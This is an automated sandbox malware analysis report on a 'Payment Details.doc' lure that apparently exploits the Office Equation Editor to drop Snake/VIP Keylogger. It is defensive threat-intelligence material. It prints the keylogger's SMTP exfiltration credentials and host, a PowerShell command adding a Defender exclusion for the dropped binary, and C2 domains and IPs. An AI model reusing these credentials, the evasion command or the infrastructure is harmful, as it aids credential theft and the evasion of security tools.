Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Details.doc

Overview

General Information

Sample name:Payment Details.doc
Analysis ID:1519253
MD5:cab2151d548586a1b3321aba7bde603d
SHA1:6ada134af583ecda2a082aeb17a3a258a0cd548f
SHA256:9e487bc68596a0c3c19aa9fed8040f452b4cbeca97451952994da511d4db2773
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3192 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3272 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ncfplgpeter20306.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
        • powershell.exe (PID: 3488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • ncfplgpeter20306.exe (PID: 3504 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
        • ncfplgpeter20306.exe (PID: 3520 cmdline: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe" MD5: 42F2CE52A57E0D72EAC297A532354E42)
    • EQNEDT32.EXE (PID: 3792 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@  ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment Details.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb5cf:$obj2: \objdata
  • 0xb5eb:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.ncfplgpeter20306.exe.3362a30.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.ncfplgpeter20306.exe.3362a30.6.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              5.2.ncfplgpeter20306.exe.3362a30.6.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.ncfplgpeter20306.exe.3362a30.6.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                5.2.ncfplgpeter20306.exe.3362a30.6.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x394c6:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b69:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38dc6:$a4: \Orbitum\User Data\Default\Login Data
                • 0x397a5:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 26 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3272, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3272, Protocol: tcp, SourceIp: 66.63.187.123, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ParentImage: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentProcessId: 3444, ParentProcessName: ncfplgpeter20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3488, ProcessName: powershell.exe
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3272, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3444, ProcessName: ncfplgpeter20306.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, NewProcessName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3272, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3444, ProcessName: ncfplgpeter20306.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ParentImage: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentProcessId: 3444, ParentProcessName: ncfplgpeter20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3488, ProcessName: powershell.exe
                Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, QueryName: checkip.dyndns.org
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ParentImage: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe, ParentProcessId: 3444, ParentProcessName: ncfplgpeter20306.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe", ProcessId: 3488, ProcessName: powershell.exe
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Temp\npvyho4d.dxj.ps1

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:25:01.423749+020020220501A Network Trojan was detected66.63.187.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:25:01.577030+020020220511A Network Trojan was detected66.63.187.12380192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:25:12.311060+020028033053Unknown Traffic192.168.2.2249166188.114.97.3443TCP
                2024-09-26T09:25:29.958052+020028033053Unknown Traffic192.168.2.2249173188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T09:25:10.807351+020028032742Potentially Bad Traffic192.168.2.2249164132.226.247.7380TCP
                2024-09-26T09:25:11.914961+020028032742Potentially Bad Traffic192.168.2.2249164132.226.247.7380TCP
                2024-09-26T09:25:17.999080+020028032742Potentially Bad Traffic192.168.2.2249167193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Payment Details.docAvira: detected
                Antivirus detection for URL or domain
                Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exeAvira: detection malicious, Label: HEUR/AGEN.1308792
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeAvira: detection malicious, Label: HEUR/AGEN.1308792
                Found malware configuration
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "peterlog@gtpv.online", "Password": "7213575aceACE@@ ", "Host": "hosting2.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exeReversingLabs: Detection: 28%
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeReversingLabs: Detection: 28%
                Multi AV Scanner detection for submitted file
                Source: Payment Details.docReversingLabs: Detection: 44%
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 66.63.187.123 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001C92F9h9_2_001C903A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001C73EDh9_2_001C7200
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001C7D77h9_2_001C7200
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001C98BBh9_2_001C94A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_001C6728
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001CED01h9_2_001CEA20
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001CF631h9_2_001CF351
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_001C6D5A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001CF199h9_2_001CEEB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_001C6F39
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001CFAC9h9_2_001CF7E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 001C98BBh9_2_001C97EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00718A42h9_2_00718748
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071A22Ah9_2_00719F30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00716349h9_2_00716078
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071F372h9_2_0071F078
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00712339h9_2_00712068
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00719D62h9_2_00719A68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00714321h9_2_00714050
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071B54Ah9_2_0071B250
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00710311h9_2_00710040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00717111h9_2_00716E40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00713101h9_2_00712E30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071CD32h9_2_0071CA38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071E51Ah9_2_0071E220
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00718F0Ah9_2_00718C10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007150E9h9_2_00714E18
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007110D9h9_2_00710E08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00717ED9h9_2_00717C08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071FD02h9_2_0071FA08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007147B9h9_2_007144E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071E9E2h9_2_0071E6E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007107A9h9_2_007104D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007175A9h9_2_007172D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007193D2h9_2_007190D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071ABBAh9_2_0071A8C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00713599h9_2_007132C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00715581h9_2_007152B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00711571h9_2_007112A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00718412h9_2_007180A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071C3A2h9_2_0071C0A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071DB8Ah9_2_0071D890
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00710C41h9_2_00710970
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00717A41h9_2_00717770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071C86Ah9_2_0071C570
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00713A31h9_2_00713760
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071E052h9_2_0071DD58
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071F83Ah9_2_0071F540
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00715A19h9_2_00715748
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00711A09h9_2_00711738
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007167E1h9_2_00716510
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071BA12h9_2_0071B718
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 007127D1h9_2_00712500
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071D1FAh9_2_0071CF00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00713EA1h9_2_00713BF8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071A6F2h9_2_0071A3F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00715EB1h9_2_00715BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071BEDAh9_2_0071BBE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 00711EA1h9_2_00711BD0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 4x nop then jmp 0071D6C2h9_2_0071D3C8
